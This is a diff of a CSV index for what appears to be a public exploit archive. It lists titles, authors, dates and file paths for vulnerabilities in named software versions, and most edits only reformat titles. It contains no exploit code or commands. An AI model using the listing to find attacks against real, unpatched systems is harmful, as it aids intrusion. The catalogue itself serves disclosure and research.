34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution Vulnerability",2010-06-16,h07,windows,dos,0 34152,platforms/linux/remote/34152.txt,"CUPS <= 1.4.2 Web Interface Information Disclosure Vulnerability",2010-06-15,"Luca Carettoni",linux,remote,0 34153,platforms/php/webapps/34153.txt,"2daybiz Network Community Script SQL Injection and Cross Site Scripting Vulnerabilities",2010-06-16,Sid3^effects,php,webapps,0 @@ -30786,12 +30786,12 @@ id,file,description,date,author,platform,type,port 34178,platforms/windows/remote/34178.txt,"id Software id Tech 4 Engine - 'idGameLocal::GetGameStateObject()' Remote Code Execution Vulnerability",2010-07-21,"Luigi Auriemma",windows,remote,0 34179,platforms/jsp/webapps/34179.txt,"IBM WebSphere ILOG JRules 6.7 Cross Site Scripting Vulnerability",2010-06-21,IBM,jsp,webapps,0 34180,platforms/asp/webapps/34180.txt,"webConductor 'default.asp' SQL Injection Vulnerability",2010-06-22,"Th3 RDX",asp,webapps,0 -34181,platforms/php/webapps/34181.txt,"SoftComplex PHP Event Calendar 1.5 Multiple Remote Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 +34181,platforms/php/webapps/34181.txt,"SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0 34182,platforms/hardware/remote/34182.txt,"Linksys WAP54Gv3 Wireless Router 'debug.cgi' Cross-Site Scripting Vulnerability",2010-06-23,"Cristofaro Mune",hardware,remote,0 -34183,platforms/php/webapps/34183.txt,"Jamroom 4.0.2/4.1.x 'forum.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0 +34183,platforms/php/webapps/34183.txt,"Jamroom 4.0.2/4.1.x - 'forum.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0 34184,platforms/hardware/remote/34184.txt,"Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",hardware,remote,0 34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls 'products.php' SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0 -34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x '/axis2/axis2-admin' Session Fixation Vulnerability",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0 +34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation Vulnerability",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0 34187,platforms/hardware/webapps/34187.txt,"Ubiquiti UbiFi / mFi / AirVision - CSRF Vulnerability",2014-07-28,"Seth Art",hardware,webapps,80 34189,platforms/php/webapps/34189.txt,"Sphider 1.3.6 - Multiple Vulnerabilities",2014-07-28,"Mike Manzotti",php,webapps,80 34190,platforms/php/webapps/34190.txt,"Oxwall 1.7.0 - Multiple CSRF And HTML Injection Vulnerabilities",2014-07-28,LiquidWorm,php,webapps,80 @@ -30807,7 +30807,7 @@ id,file,description,date,author,platform,type,port 34203,platforms/hardware/webapps/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,webapps,0 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80 -34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 +34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector 'id' Parameter SQL Injection Vulnerability",2010-06-28,Tr0y-x,php,webapps,0 34208,platforms/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point DCC Protocol Security Bypass Vulnerability",2010-06-28,"Cristofaro Mune",hardware,remote,0 34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS 'Username' Parameter SQL Injection Vulnerability",2010-06-28,S.W.T,php,webapps,0 @@ -30830,9 +30830,9 @@ id,file,description,date,author,platform,type,port 34226,platforms/php/webapps/34226.txt,"System CMS Contentia 'news.php' SQL Injection Vulnerability",2010-06-30,GlaDiaT0R,php,webapps,0 34227,platforms/windows/dos/34227.txt,"Qt <= 4.6.3 - Remote Denial of Service Vulnerability",2010-06-29,"Luigi Auriemma",windows,dos,0 34228,platforms/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service Vulnerability",2010-06-29,"Luigi Auriemma",linux,dos,0 -34229,platforms/php/webapps/34229.txt,"ArcademSX 2.904 'cat' Parameter Cross Site Scripting Vulnerability",2010-06-29,"Th3 RDX",php,webapps,0 +34229,platforms/php/webapps/34229.txt,"ArcademSX 2.904 - 'cat' Parameter Cross Site Scripting Vulnerability",2010-06-29,"Th3 RDX",php,webapps,0 34230,platforms/windows/remote/34230.txt,"Freewebscriptz Online Games Login Multiple SQL Injection Vulnerabilities",2009-12-31,"Hussin X",windows,remote,0 -34231,platforms/php/webapps/34231.txt,"LiveZilla 3.1.8.3 Multiple Cross Site Scripting Vulnerabilities",2009-12-30,MaXe,php,webapps,0 +34231,platforms/php/webapps/34231.txt,"LiveZilla 3.1.8.3 - Multiple Cross Site Scripting Vulnerabilities",2009-12-30,MaXe,php,webapps,0 34232,platforms/php/webapps/34232.txt,"DPScms 'q' Parameter SQL Injection and Cross Site Scripting Vulnerabilities",2010-07-01,Ariko-Security,php,webapps,0 34233,platforms/windows/dos/34233.py,"Sumatra PDF 1.1 Denial Of Service Vulnerability",2010-07-01,"Azim Poonawala",windows,dos,0 34234,platforms/php/webapps/34234.txt,"Flatnux 2010-06.09 'find' Parameter Cross Site Scripting Vulnerability",2010-07-01,ITSecTeam,php,webapps,0 @@ -30846,7 +30846,7 @@ id,file,description,date,author,platform,type,port 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-02,Vulnerability-Lab,ios,webapps,8080 34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 (data.php) - Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 'comment.php' Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 -34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 Remote Buffer Overflow Vulnerability",2010-07-05,"Pedro Andujar",multiple,dos,0 +34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow Vulnerability",2010-07-05,"Pedro Andujar",multiple,dos,0 34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0 34250,platforms/php/webapps/34250.txt,"Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Include Vulnerabilities",2010-07-05,Drosophila,php,webapps,0 34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0 @@ -30864,9 +30864,9 @@ id,file,description,date,author,platform,type,port 34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34264,platforms/ios/webapps/34264.txt,"FreeDisk v1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 'slideshow.js.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 -34266,platforms/php/webapps/34266.txt,"RunCms 2.1 'check.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 -34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x 'pbs_mom' Insecure Temporary File Creation Vulnerability",2010-07-07,"Bartlomiej Balcerek",linux,local,0 -34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 +34266,platforms/php/webapps/34266.txt,"RunCMS 2.1 'check.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 +34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x - 'pbs_mom' Insecure Temporary File Creation Vulnerability",2010-07-07,"Bartlomiej Balcerek",linux,local,0 +34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 'install1.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0 @@ -30876,29 +30876,29 @@ id,file,description,date,author,platform,type,port 34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0 34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0 34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0 -34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 +34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0 34283,platforms/php/webapps/34283.txt,"Model Agency Manager 'search_process.php' Cross-Site Scripting Vulnerability",2009-12-13,bi0,php,webapps,0 34284,platforms/php/webapps/34284.txt,"osCSS 1.2.2 'page' Parameter Cross Site Scripting Vulnerability",2010-07-08,"High-Tech Bridge SA",php,webapps,0 -34285,platforms/php/webapps/34285.txt,"ArticleMS 2.0 'c[]' Parameter Cross Site Scripting Vulnerability",2010-12-13,Packetdeath,php,webapps,0 -34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 +34285,platforms/php/webapps/34285.txt,"Articlems 2.0 'c[]' Parameter Cross Site Scripting Vulnerability",2010-12-13,Packetdeath,php,webapps,0 +34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 - Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0 34289,platforms/php/webapps/34289.txt,"Web Cocoon simpleCMS - 'show.php' SQL Injection Vulnerability",2009-12-21,anonymous,php,webapps,0 34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0 34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 -34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 +34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 - Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 'clave' Parameter Cross Site Scripting Vulnerability",2010-07-12,"David K",java,webapps,0 -34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 -34295,platforms/php/webapps/34295.txt,"RunCms 2.1 'magpie_debug.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0 +34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 - Multiple Cross Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 +34295,platforms/php/webapps/34295.txt,"RunCMS 2.1 'magpie_debug.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0 34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 'css_optimiser.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0 34297,platforms/multiple/remote/34297.txt,"dotDefender Cross-Site Scripting Security Bypass Vulnerability",2010-07-09,SH4V,multiple,remote,0 34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0 34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 'default_cms_lang' Parameter Local File Include Vulnerability",2010-07-11,"John Leitch",php,webapps,0 34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0 -34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0 -34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0 +34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0 +34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0 34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Include Vulnerability",2014-08-09,Vulnerability-Lab,ios,webapps,8000 34305,platforms/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection Vulnerabilities",2014-08-09,Vulnerability-Lab,ios,webapps,8080 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23 @@ -30931,7 +30931,7 @@ id,file,description,date,author,platform,type,port 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0 34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 -34343,platforms/asp/webapps/34343.txt,"MOJO IWMS 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0 +34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0 34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 'parametre' Parameter Remote Command Execution Vulnerability",2010-07-18,"Marshall Whittaker",cgi,webapps,0 @@ -30939,11 +30939,11 @@ id,file,description,date,author,platform,type,port 34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 'context[path_to_root]' Parameter Remote File Include Vulnerability",2010-07-18,eidelweiss,php,webapps,0 34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles HTML Injection Vulnerability",2010-07-15,D4rk357,php,webapps,0 34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 -34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 +34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0 34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0 34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 -34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0 +34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0 34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0 34358,platforms/linux/remote/34358.txt,"Mozilla Firefox and SeaMonkey Plugin Parameters - Buffer Overflow Vulnerability",2010-07-20,J23,linux,remote,0 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0 @@ -30952,7 +30952,7 @@ id,file,description,date,author,platform,type,port 34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,metasploit,linux,remote,443 34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0 34364,platforms/linux/dos/34364.html,"Qt <= 4.6.3 'QTextEngine::LayoutData::reallocate()' Memory Corruption Vulnerability",2010-07-13,D4rk357,linux,dos,0 -34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 Multiple Cross Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 +34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 'calendar' Cross Site Scripting Vulnerability",2009-11-02,"Vladimir Vorontsov",php,webapps,0 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 'comments.php' Multiple Cross Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder '.mp3' File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 @@ -30964,9 +30964,9 @@ id,file,description,date,author,platform,type,port 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 'standardize()' Buffer Overflow Vulnerability",2010-07-26,"Brendan Boerner",linux,dos,0 34376,platforms/asp/webapps/34376.txt,"e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 -34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0 +34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Security Vulnerabilities",2010-10-04,Abysssec,php,webapps,0 34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI Cross Site Scripting Vulnerability",2009-12-04,anonymous,php,webapps,0 -34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0 +34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0 34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 'searchadvance.asp' Cross Site Scripting Vulnerability",2009-12-22,"Andrea Bocchetti",asp,webapps,0 34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0 34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0 @@ -30982,7 +30982,7 @@ id,file,description,date,author,platform,type,port 34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component 'controller' Parameter Directory Traversal Vulnerability",2010-08-03,FL0RiX,php,webapps,0 34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 Web Server HTTP GET Request Remote Buffer Overflow Vulnerability",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0 -34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 +34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes 'music_out.php' Cross Site Scripting Vulnerability",2014-08-03,LiquidWorm,php,webapps,0 @@ -30998,7 +30998,7 @@ id,file,description,date,author,platform,type,port 34412,platforms/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 SQL Injection and HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34413,platforms/php/webapps/34413.txt,"DiamondList /user/main/update_settings setting[site_title] Parameter XSS",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34414,platforms/php/webapps/34414.txt,"DiamondList /user/main/update_category category[description] Parameter XSS",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34415,platforms/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34415,platforms/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34416,platforms/php/webapps/34416.txt,"Muraus Open Blog Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 'page' Parameter Cross Site Scripting Vulnerability",2010-08-06,"High-Tech Bridge SA",php,webapps,0 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 'admin.php' Cross Site Scripting Vulnerability",2010-08-06,MustLive,php,webapps,0 @@ -31009,8 +31009,8 @@ id,file,description,date,author,platform,type,port 34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 '.m3u' File Buffer Overflow Vulnerability",2010-08-09,"Abhishek Lyall",windows,dos,0 -34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 -34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 +34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 +34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0 @@ -31030,14 +31030,14 @@ id,file,description,date,author,platform,type,port 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 -34452,platforms/php/webapps/34452.py,"XRMS - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 +34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection and Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0 34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0 34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0 34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0 -34458,platforms/windows/dos/34458.html,"Internet Explorer MS14-029 Memory Corruption PoC",2014-08-28,PhysicalDrive0,windows,dos,0 -34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 +34458,platforms/windows/dos/34458.html,"Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 +34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 34460,platforms/windows/dos/34460.py,"Sonique 2.0 '.xpl' File Remote Stack-Based Buffer Overflow Vulnerability",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution Vulnerability",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass Vulnerability",2010-08-13,"Emmanuel Bouillon",windows,remote,0 @@ -31046,7 +31046,7 @@ id,file,description,date,author,platform,type,port 34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 34466,platforms/php/webapps/34466.txt,"CMS Source Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS 'search_text' Parameter Cross Site Scripting Vulnerability",2010-08-13,"High-Tech Bridge SA",php,webapps,0 -34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 Multiple Cross Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 